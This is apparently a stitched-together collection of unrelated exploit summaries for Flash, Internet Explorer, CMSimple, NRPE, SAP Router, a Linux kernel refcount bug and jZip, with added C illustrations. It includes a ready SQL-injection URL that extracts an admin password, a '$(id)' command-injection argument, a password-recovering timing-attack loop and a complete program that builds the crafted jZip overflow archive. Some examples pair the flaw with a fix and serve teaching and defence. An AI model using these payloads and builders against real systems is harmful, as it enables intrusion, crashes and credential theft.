This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.5.502.149. By supplying a specially crafted SWF file containing a malformed regular expression value, it is possible to trigger a memory corruption that results in remote code execution in the context of the current user, as exploited in the wild in February 2013. This module has been tested successfully with Adobe Flash Player 11.5 before 11.5.502.149 on Windows XP SP3 and on Windows 7 SP1 prior to MS13-063, since it relies on a predictable SharedUserData region to leak the ntdll base and bypass ASLR.
The vulnerability exists due to insufficient validation of the HTTP request origin (cross-site request forgery). A remote attacker can trick a logged-in administrator into visiting a specially crafted web page that changes the SSID and its password.
The LFI vulnerability is in index.php, so a file can be included via http://[site]/index.php?view=[file]. The LFI can also be used to include the 'admin' files, which are particularly insecure and allow SQL queries to be injected. Using the file admin/sources/edit_loginad.php, a PoC is: http://[site]/index.php?view=../admin/Sources/edit_loginad&edit=-1%20union%20select%201,2,3,4,%28SELECT%20password%20FROM%20admin%29,6,7,8,9--%20-
This PoC is based on Wilmer van der Gaast's code and is used to reactivate the Sercomm TCP/32764 backdoor. It sends a packet of type PING_BACKDOOR to the target's MAC address.
CMSimple is a PHP-based content management system (CMS) that requires no database; all data is stored as plain files on the file system. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server that includes a URL in the 'pth[folder][plugin]' parameter. This allows the attacker to include a remote file containing arbitrary code, which is then executed by the vulnerable server (remote file inclusion).
This exploit is proof-of-concept (PoC) code for CVE-2014-2851, a Linux kernel group_info reference-counter overflow that leads to memory corruption. The code is written in C and aims to crash the system (or, failing that, the program itself). It takes a while to execute because it makes 2^32 socket() calls in order to wrap the 32-bit counter.
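The following is an added illustration of the counter-wrap mechanism, not the CVE-2014-2851 PoC itself. It models a heap object with a reference count that is bumped by an unbalanced "get" (as happens once per socket() call in the vulnerable kernel) and never released. The kernel counter is 32 bits wide, which is why 2^32 calls are needed; here a 16-bit counter stands in (an assumption for speed) so the wrap happens after 65536 increments. A saturating variant, in the spirit of the kernel's later refcount_t, is shown beside it for contrast.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

typedef struct {
    uint16_t refs;   /* 16-bit stand-in for the kernel's 32-bit atomic_t */
    int freed;       /* set instead of calling free() so the caller can inspect it */
} obj_t;

static obj_t *obj_new(void) {
    obj_t *o = calloc(1, sizeof *o);
    if (!o) abort();
    o->refs = 1;                 /* the creating holder's reference */
    return o;
}

/* Unchecked get, like the unbalanced get_group_info(): no overflow guard. */
static void obj_get(obj_t *o) { o->refs++; }

/* Checked get: refuse to take a reference once the counter is saturated. */
static int obj_get_checked(obj_t *o) {
    if (o->refs == UINT16_MAX) return 0;
    o->refs++;
    return 1;
}

/* put: release one reference; the object is "freed" when the count hits zero. */
static void obj_put(obj_t *o) {
    if (--o->refs == 0) o->freed = 1;
}

/* Leak `n` references without ever releasing them; returns the counter afterwards. */
static uint16_t leak_refs(obj_t *o, unsigned long n, int checked) {
    for (unsigned long i = 0; i < n; i++) {
        if (checked) obj_get_checked(o);
        else         obj_get(o);
    }
    return o->refs;
}

/* Scenario: a holder keeps one reference while a leaker bumps the counter
 * 65535 times. Unchecked, 1 + 65535 wraps to 0; a later balanced get/put pair
 * then drives the count 0 -> 1 -> 0 and frees the object out from under the
 * holder. Returns 1 if the holder's object was freed (use-after-free), else 0. */
static int demo(int checked) {
    obj_t *o = obj_new();
    leak_refs(o, 65535, checked);
    if (checked) obj_get_checked(o);   /* a well-behaved user comes and goes */
    else         obj_get(o);
    obj_put(o);
    int freed_under_holder = o->freed;
    free(o);
    return freed_under_holder;
}

int main(void) {
    printf("unchecked counter:  holder's object freed = %d\n", demo(0));
    printf("saturating counter: holder's object freed = %d\n", demo(1));
    return 0;
}
```

With the unchecked counter the holder's object is released while it is still in use; with the saturating counter the leaked references pin the object forever (a leak, but not a use-after-free). Scaling the loop to 2^32 is what makes the real PoC slow.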
Nagios Remote Plugin Executor (NRPE) contains a vulnerability that could allow a remote attacker to inject and execute arbitrary commands on the host under the NRPE account (typically 'nagios'). The vulnerability is due to NRPE not properly sanitizing user-supplied arguments before passing them to a command shell as part of a configured command. To take advantage of it, NRPE must be compiled with command-argument support and configured to accept arguments (dont_blame_nrpe=1). No authentication is required to exploit this vulnerability if the NRPE port has not been restricted by a firewall.
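As an added example (not NRPE's own code), the block below contrasts a denylist of shell metacharacters with an allowlist, and shows the command string a shell would receive once a supplied argument is substituted into a configured check line. The denylist here is illustrative and deliberately omits '$' and '(' so that command substitution slips past it; the template format ($ARG1$, $ARG2$) follows the Nagios convention, but the template string and sample arguments are constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Illustrative denylist (assumption: not NRPE's actual list). */
static const char DENYLIST[] = "|`&><'\"\\[]{};";

/* Denylist check: pass unless one of the listed characters appears. */
static int denylist_ok(const char *arg) {
    return strpbrk(arg, DENYLIST) == NULL;
}

/* Allowlist check: pass only if every character is one that can never open
 * a shell construct. Everything else, including '$' and '(', is rejected. */
static int allowlist_ok(const char *arg) {
    static const char SAFE[] = "abcdefghijklmnopqrstuvwxyz"
                               "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                               "0123456789._-/:=,";
    return *arg != '\0' && strspn(arg, SAFE) == strlen(arg);
}

/* Vet every argument with `check`; returns the index of the first rejected
 * argument, or -1 if all pass. */
static int vet_args(const char *const *args, int n, int (*check)(const char *)) {
    for (int i = 0; i < n; i++)
        if (!check(args[i])) return i;
    return -1;
}

/* Substitute $ARG1$, $ARG2$, ... into a command template, which is what an
 * argument-enabled check line looks like just before it is handed to a shell.
 * Returns the expanded length, or -1 if `out` is too small. */
static int expand_template(const char *tmpl, const char *const *args, int nargs,
                           char *out, size_t outlen) {
    size_t n = 0;
    while (*tmpl) {
        const char *p = tmpl;
        int idx = 0;
        if (strncmp(p, "$ARG", 4) == 0 && isdigit((unsigned char)p[4])) {
            p += 4;
            while (isdigit((unsigned char)*p)) idx = idx * 10 + (*p++ - '0');
            if (*p == '$' && idx >= 1 && idx <= nargs) {
                size_t l = strlen(args[idx - 1]);
                if (n + l >= outlen) return -1;
                memcpy(out + n, args[idx - 1], l);
                n += l;
                tmpl = p + 1;
                continue;
            }
        }
        if (n + 1 >= outlen) return -1;
        out[n++] = *tmpl++;
    }
    out[n] = '\0';
    return (int)n;
}

int main(void) {
    const char *args[] = { "5", "$(id)" };          /* constructed client input */
    char cmd[128];
    printf("denylist rejects index %d, allowlist rejects index %d\n",
           vet_args(args, 2, denylist_ok), vet_args(args, 2, allowlist_ok));
    expand_template("check_users -w $ARG1$ -c $ARG2$", args, 2, cmd, sizeof cmd);
    printf("string a shell would receive: %s\n", cmd);   /* $(id) would be expanded */
    return 0;
}
```

The second argument passes the denylist untouched and ends up as "$(id)" inside the string a shell would evaluate; the allowlist rejects it at index 1. Beyond filtering, building an argv array and exec'ing the plugin directly, with no shell in between, removes the metacharacter problem entirely.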
A vulnerability has been found in SAP Router that could allow an unauthenticated remote attacker to recover the passwords used to protect route entries through a timing side-channel attack.
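The page does not give the mechanism of the SAP Router side channel, so the following added example (not SAP's code) shows the generic class: a password check that returns at the first mismatching byte leaks, through its running time, how long the correct prefix is, and an attacker can recover the secret one byte at a time. A comparison counter stands in for the wall-clock measurement a remote attacker would make; the secret and the candidate alphabet are constructed.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Number of byte comparisons made by the last check call: a proxy for
 * the elapsed time an attacker observes on the wire. */
static size_t g_steps;

/* Leaky check: stops at the first mismatch, so the step count (and time)
 * grows with the length of the correct prefix of `guess`. */
static int leaky_equal(const char *guess, const char *secret, size_t n) {
    g_steps = 0;
    for (size_t i = 0; i < n; i++) {
        g_steps++;
        if (guess[i] != secret[i]) return 0;
    }
    return 1;
}

/* Constant-time check: always touches every byte and folds the differences
 * into an accumulator, so the step count does not depend on the input. */
static int ct_equal(const char *guess, const char *secret, size_t n) {
    g_steps = 0;
    unsigned char acc = 0;
    for (size_t i = 0; i < n; i++) {
        g_steps++;
        acc |= (unsigned char)(guess[i] ^ secret[i]);
    }
    return acc == 0;
}

/* Attacker loop: for each position, keep the candidate byte that makes the
 * check run longest (or that makes it succeed). Returns how many leading
 * bytes of `out` match the secret afterwards. */
static size_t recover(int (*check)(const char *, const char *, size_t),
                      const char *secret, size_t n, char *out) {
    memset(out, ' ', n);
    for (size_t i = 0; i < n; i++) {
        char best = ' ';
        size_t best_steps = 0;
        int done = 0;
        for (int c = 0x20; c <= 0x7e; c++) {      /* printable ASCII candidates */
            out[i] = (char)c;
            if (check(out, secret, n)) { best = (char)c; done = 1; break; }
            if (g_steps > best_steps) { best_steps = g_steps; best = (char)c; }
        }
        out[i] = best;
        if (done) break;
    }
    size_t match = 0;
    while (match < n && out[match] == secret[match]) match++;
    return match;
}

int main(void) {
    const char *secret = "s3cr3t";                 /* constructed secret */
    char guess[8];
    printf("leaky check:         %zu of 6 bytes recovered\n",
           recover(leaky_equal, secret, 6, guess));
    printf("constant-time check: %zu of 6 bytes recovered\n",
           recover(ct_equal, secret, 6, guess));
    return 0;
}
```

Against the early-exit comparison the attacker needs at most 95 guesses per byte instead of 95^6 overall; against the constant-time comparison the measurements are flat and the loop learns nothing. In a real implementation the length must also not leak (compare fixed-size digests rather than variable-length strings), and the comparison must be written so the compiler does not reintroduce a data-dependent branch.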
This module exploits a use-after-free condition in Internet Explorer, as used in the wild in 'Operation SnowMan' in February 2014. The module uses Flash Player 12 in order to bypass ASLR and, finally, DEP.
This exploit targets an SEH Unicode buffer overflow in jZip v2.0.0.132900. The vulnerability is triggered when a specially crafted zip file is opened, causing a denial of service. The exploit author created a zip file containing a payload of 862 'A' characters, followed by a 4-byte nSEH value and a 4-byte SEH value, and then 3198 'D' characters; the payload ends with a .txt extension.
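As an added example (not the original exploit's code), the block below reconstructs an archive with the layout described above. It assumes the payload is the archive member's name, that the member itself is empty and stored uncompressed, and uses "BBBB"/"CCCC" as placeholders for the nSEH and SEH values, which the page does not give. The ZIP header layout (local file header, central directory entry, end-of-central-directory record) follows the public PKWARE format.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PAD_A    862
#define PAD_D    3198
#define NAME_LEN (PAD_A + 4 + 4 + PAD_D + 4)   /* 4072 bytes */

/* Build the crafted member name: A*862 | nSEH | SEH | D*3198 | ".txt".
 * Returns the name length. */
static size_t build_name(char *name, const char nseh[4], const char seh[4]) {
    char *p = name;
    memset(p, 'A', PAD_A); p += PAD_A;
    memcpy(p, nseh, 4);    p += 4;     /* placeholder, not the real value */
    memcpy(p, seh, 4);     p += 4;     /* placeholder, not the real value */
    memset(p, 'D', PAD_D); p += PAD_D;
    memcpy(p, ".txt", 4);  p += 4;
    return (size_t)(p - name);
}

/* Little-endian field writers for the ZIP headers. */
static void put16(uint8_t **p, uint16_t v) { (*p)[0] = v & 0xff; (*p)[1] = v >> 8; *p += 2; }
static void put32(uint8_t **p, uint32_t v) {
    for (int i = 0; i < 4; i++) (*p)[i] = (v >> (8 * i)) & 0xff;
    *p += 4;
}

/* Write a one-member ZIP archive (stored, zero-length member) whose member
 * name is `name`. Returns the archive size, or 0 if `out` is too small. */
static size_t build_zip(const char *name, size_t nlen, uint8_t *out, size_t outlen) {
    size_t need = 30 + nlen + 46 + nlen + 22;
    if (need > outlen || nlen > 0xffff) return 0;
    uint8_t *p = out;
    /* local file header (30 bytes + name) */
    put32(&p, 0x04034b50); put16(&p, 20); put16(&p, 0); put16(&p, 0);
    put16(&p, 0); put16(&p, 0x21);               /* mtime 00:00, mdate 1980-01-01 */
    put32(&p, 0); put32(&p, 0); put32(&p, 0);    /* crc32, csize, usize: empty member */
    put16(&p, (uint16_t)nlen); put16(&p, 0);
    memcpy(p, name, nlen); p += nlen;
    /* central directory entry (46 bytes + name) */
    uint32_t cd_off = (uint32_t)(p - out);
    put32(&p, 0x02014b50); put16(&p, 20); put16(&p, 20); put16(&p, 0); put16(&p, 0);
    put16(&p, 0); put16(&p, 0x21);
    put32(&p, 0); put32(&p, 0); put32(&p, 0);
    put16(&p, (uint16_t)nlen); put16(&p, 0); put16(&p, 0);
    put16(&p, 0); put16(&p, 0); put32(&p, 0);    /* disk, internal attrs, external attrs */
    put32(&p, 0);                                /* offset of local header */
    memcpy(p, name, nlen); p += nlen;
    uint32_t cd_size = (uint32_t)(p - out) - cd_off;
    /* end of central directory record (22 bytes) */
    put32(&p, 0x06054b50); put16(&p, 0); put16(&p, 0); put16(&p, 1); put16(&p, 1);
    put32(&p, cd_size); put32(&p, cd_off); put16(&p, 0);
    return (size_t)(p - out);
}

int main(void) {
    static char name[NAME_LEN];
    static uint8_t zip[16384];
    size_t nlen = build_name(name, "BBBB", "CCCC");
    size_t zlen = build_zip(name, nlen, zip, sizeof zip);
    FILE *f = fopen("jzip_poc.zip", "wb");
    if (!f || fwrite(zip, 1, zlen, f) != zlen) { perror("jzip_poc.zip"); return 1; }
    fclose(f);
    printf("wrote %zu-byte archive, member name %zu bytes\n", zlen, nlen);
    return 0;
}
```

The resulting archive is 8242 bytes: two copies of the 4072-byte name plus the three fixed-size headers. Because the member is empty and stored, the CRC and size fields are legitimately zero, so a strict reader still accepts the file and reaches the over-long name.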